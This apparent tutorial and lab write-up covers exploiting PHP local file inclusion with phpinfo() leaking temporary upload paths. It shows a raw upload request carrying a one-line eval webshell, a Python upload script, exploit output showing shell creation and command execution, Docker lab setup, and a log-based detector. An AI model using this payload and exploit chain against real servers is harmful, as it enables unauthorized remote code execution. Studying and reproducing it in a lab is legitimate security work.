PHP local file inclusion vulnerability: environment construction and exploitation

Source: Internet
Author: User
Tags: phpinfo, docker hub, docker run

0x00 About

The PHP local file inclusion (LFI) vulnerability is well documented; WooYun published articles on it early on, and "LFI with phpinfo" was first described by foreign researchers in the two papers referenced below. The principle: a PHP POST upload causes the server to write a temporary file; phpinfo() discloses that temporary file's path and name; the local file inclusion vulnerability then includes the temporary file, which drops a one-line backdoor.

This method has been tested successfully locally. To make learning easier and cheaper, a Docker environment has been built for testing. Running the built Docker image on a foreign VPS and running the scripts under the POC folder of the GitHub project Lfi_phpinfo locally still gets a shell, so the approach works and does not place high demands on the network.

    • Docker Hub image address: janes/lfi_phpinfo

    • GitHub project address: Lfi_phpinfo

In the source code directory, the Docker files reproduce the environment and the POC directory holds the exploitation scripts.

Papers

http://gynvael.coldwind.pl/download.php?f=PHP_LFI_rfc1867_temporary_files.pdf

http://www.insomniasec.com/publications/LFI%20With%20PHPInfo%20Assistance.pdf

0x01 PHP upload

When a file is uploaded to any PHP file on the server, a temporary file is generated, and the path and name of that temporary file can be read directly from the phpinfo page.

    • POST upload file

When an arbitrary file is uploaded to PHP via POST, the server creates a temporary file to hold the file contents.

To make file transfer convenient over HTTP, a form-based HTML file upload method is provided.

The upload form must have the attribute enctype="multipart/form-data" and must use POST; see PHP File Upload: POST method.

The PHP engine handles an enctype="multipart/form-data" request as follows:

    1. The request arrives
    2. A temporary file is created and the uploaded file's contents are written to it
    3. The corresponding PHP script is called for processing, such as checking the name, size, etc.
    4. The temporary file is deleted

So the PHP engine first saves the file contents to a temporary file and only then performs the script's own processing. The temporary file name is "php" followed by random characters.

    • $_FILES information, including the temporary file path and name

In PHP, the superglobal variable $_FILES holds information about the uploaded file, including the file name, type, temporary file name, error code and size.

0x02 Manual test: getting the temporary file path from phpinfo()

    • HTML form

File upload.html (the markup was lost in extraction; the form below is reconstructed from the field names, action and encoding visible in the captured request):

    #!html
    <form action="phpinfo.php" method="post" enctype="multipart/form-data">
        <input type="file" name="file">
        <input type="submit" name="submit" value="Submit">
    </form>

    • Open upload.html in the browser and upload the file file.txt
    • Burp shows the POST request as follows

    #!bash
    POST /lfi_phpinfo/phpinfo.php HTTP/1.1
    Host: 127.0.0.1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1/lfi_phpinfo/upload.html
    Connection: close
    Content-Type: multipart/form-data; boundary=---------------------------11008921013555437861019615112
    Content-Length: 368

    -----------------------------11008921013555437861019615112
    Content-Disposition: form-data; name="file"; filename="file.txt"
    Content-Type: text/plain

    <?php eval($_REQUEST["cmd"]); ?>
    -----------------------------11008921013555437861019615112
    Content-Disposition: form-data; name="submit"

    Submit
    -----------------------------11008921013555437861019615112--
    • In the browser, phpinfo returns the following information:

    #!php
    _REQUEST["submit"]    submit
    _POST["submit"]       submit
    _FILES["file"]        Array
    (
        [name] => file.txt
        [type] => text/plain
        [tmp_name] => /tmp/phpufdchh
        [error] => 0
        [size] => +
    )

This gives the tmp_name path.

0x03 Python script to upload the file

    #!python
    import requests

    host = '127.0.0.1'
    url = 'http://{ip}/lfi_phpinfo/phpinfo.php'.format(ip=host)
    file_ = '/var/www/lfi_phpinfo/file.txt'
    # the form field is called "name"; the server writes the body to a temporary file
    # and phpinfo() prints the resulting $_FILES entry in the response
    with open(file_, 'rb') as fh:
        response = requests.post(url, files={"name": fh})
    print(response.text)
    • Partial result

    #!php
    _FILES["name"]
    Array
    (
        [name] => file.txt
        [type] =>
        [tmp_name] => /tmp/php7evbv3
        [error] => 0
        [size] => 33
    )

0x04 Local environment build

    • Get shell

    #!bash
    $ python lfi_phpinfo.py 127.0.0.1
    LFI with phpinfo()
    ==============================
    INFO:__main__:Getting initial offset ...
    INFO:__main__:Found [tmp_name] at 67801
    INFO:__main__:Got it! Shell created in /tmp/g
    INFO:__main__:Wowo! \m/
    INFO:__main__:Shutting down ...
    • Firefox access

    #!bash
    http://127.0.0.1/lfi_phpinfo/lfi.php?load=/tmp/gc&f=id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

This shows that getshell succeeded; from here you can experiment freely ~~
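As a defender's counterpart to the chain above, here is an added example (not from the original post or the lfi_phpinfo project) that flags both halves of the technique in Apache combined-format access logs: a burst of POSTs to phpinfo.php and an include parameter pointing into /tmp. The log lines, the extra parameter names beside `load`, and the burst threshold are assumptions.

```python
# Added example: detect the LFI-with-phpinfo race in Apache "combined" access logs.
# Not from the original post or the lfi_phpinfo project; the log lines below are constructed.
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# ip - - [time] "METHOD path HTTP/x" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"')
INCLUDE_PARAMS = ("load", "file", "page")  # "load" is the test app's; the others are assumed
POST_BURST_THRESHOLD = 3  # repeated phpinfo POSTs from one client are the upload half of the race

# Constructed sample: attacker race, then use of the dropped shell; one benign client at the end
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2016:10:00:01 +0000] "POST /lfi_phpinfo/phpinfo.php HTTP/1.1" 200 67801 "-" "python-requests/2.9"
203.0.113.5 - - [10/Mar/2016:10:00:01 +0000] "GET /lfi_phpinfo/lfi.php?load=/tmp/phpUfdCHh HTTP/1.1" 200 12 "-" "python-requests/2.9"
203.0.113.5 - - [10/Mar/2016:10:00:01 +0000] "POST /lfi_phpinfo/phpinfo.php HTTP/1.1" 200 67801 "-" "python-requests/2.9"
203.0.113.5 - - [10/Mar/2016:10:00:02 +0000] "POST /lfi_phpinfo/phpinfo.php HTTP/1.1" 200 67801 "-" "python-requests/2.9"
203.0.113.5 - - [10/Mar/2016:10:00:03 +0000] "GET /lfi_phpinfo/lfi.php?load=/tmp/g&f=id HTTP/1.1" 200 60 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2016:10:05:00 +0000] "GET /lfi_phpinfo/lfi.php?load=about HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2016:10:05:02 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_lfi_phpinfo(log_text):
    """Return (ip, reason) findings for both halves of the technique."""
    findings, phpinfo_posts = [], defaultdict(int)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["path"])
        # Half 1: a multipart POST to phpinfo.php is the step that plants the temp file
        if rec["method"] == "POST" and parts.path.lower().endswith("phpinfo.php"):
            phpinfo_posts[rec["ip"]] += 1
        # Half 2: an include parameter pointing into /tmp (php* temp file or the dropped shell)
        for p in INCLUDE_PARAMS:
            for value in parse_qs(parts.query).get(p, []):
                if value.startswith("/tmp/"):
                    findings.append((rec["ip"], f"include param {p}={value}"))
    for ip, n in phpinfo_posts.items():
        if n >= POST_BURST_THRESHOLD:
            findings.append((ip, f"{n} POSTs to phpinfo.php"))
    return findings
```

Either half alone is a strong signal; disabling phpinfo pages and never passing request parameters into include() removes both.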

0x05 Using Docker to build your own environment

Basic Docker usage is not covered here; you can look it up yourself. There are two image sources: build the image yourself from the Dockerfile in the GitHub lfi_phpinfo project, or use the image I've built, janes/lfi_phpinfo.

    • Image source

-- php:5.6-apache (PHP official image)

Or

-- janes/lfi_phpinfo

    • Build the environment and run the tests

Get the GitHub lfi_phpinfo source code, switch to the web directory, and start building the environment for testing. Three ways to run it are provided:

    1. Mode 1: run the test using the PHP official image (the bind mount needs an absolute host path, hence $(pwd))

      #!bash
      docker run --rm -v "$(pwd)/code:/var/www/html" -p 80:80 php:5.6-apache

    2. Mode 2: run the test using the pre-built image janes/lfi_phpinfo

      #!bash
      docker pull janes/lfi_phpinfo
      docker run --rm -p 80:80 janes/lfi_phpinfo

    3. Mode 3: use docker-compose

      #!bash
      docker-compose up

You can then use the Python script to getshell against the container:

    #!bash
    python lfi_phpinfo.py DOCKER_HOST_IP

0x06 Concluding remarks

Practising LFI with phpinfo hands-on is in fact not as smooth as the articles make it sound; along the way you run into various environment-related problems, and solving them takes energy. That is where the idea of building the test environment with Docker came from, and I hope it gives cyber-security enthusiasts a more convenient learning environment. Finally, thanks to the author of the [LFI with phpinfo local test process] article, which helped me a lot in studying LFI with phpinfo.
